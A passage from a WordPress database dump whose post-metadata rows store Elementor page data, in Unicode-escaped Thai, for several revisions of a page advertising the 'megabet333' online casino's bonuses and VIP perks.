\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e15\\u0e2d\\u0e1a\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(994,130,'_thumbnail_id','60'),(995,130,'_elementor_edit_mode','builder'),(996,130,'_elementor_template_type','wp-page'),(997,130,'_elementor_version','3.32.5'),(998,130,'_elementor_pro_version','3.32.3'),(999,130,'_wp_page_template','default'),(1000,130,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1001,130,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/search_megabet_333_-_Megabet333-Biz.webp\",\"id\":60,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_Get_200_-_Megabet333-Biz.webp\",\"id\":53,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e23\\u0e30\\u0e1a\\u0e1a VIP \\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e04\\u0e48\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e19 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e41\\u0e17\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e01\\u0e23\\u0e14\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e14\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1e\\u0e49\\u0e43\\u0e04\\u0e23 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e27\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e47\\u0e15 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e22\\u0e31\\u0e07\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e15\\u0e2d\\u0e1a\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1007,131,'_thumbnail_id','60'),(1008,131,'_elementor_edit_mode','builder'),(1009,131,'_elementor_template_type','wp-page'),(1010,131,'_elementor_version','3.32.5'),(1011,131,'_elementor_pro_version','3.32.3'),(1012,131,'_wp_page_template','default'),(1013,131,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1014,131,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/search_megabet_333_-_Megabet333-Biz.webp\",\"id\":60,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_Get_200_-_Megabet333-Biz.webp\",\"id\":53,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e23\\u0e30\\u0e1a\\u0e1a VIP \\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e04\\u0e48\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e19 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e41\\u0e17\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e01\\u0e23\\u0e14\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e14\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1e\\u0e49\\u0e43\\u0e04\\u0e23 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e27\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e47\\u0e15 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e22\\u0e31\\u0e07\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e15\\u0e2d\\u0e1a\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1018,132,'_thumbnail_id','60'),(1019,132,'_elementor_edit_mode','builder'),(1020,132,'_elementor_template_type','wp-page'),(1021,132,'_elementor_version','3.32.5'),(1022,132,'_elementor_pro_version','3.32.3'),(1023,132,'_wp_page_template','default'),(1024,132,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1025,132,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/search_megabet_333_-_Megabet333-Biz.webp\",\"id\":60,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_Get_200_-_Megabet333-Biz.webp\",\"id\":53,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e23\\u0e30\\u0e1a\\u0e1a VIP \\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e04\\u0e48\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e19 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e41\\u0e17\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e01\\u0e23\\u0e14\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 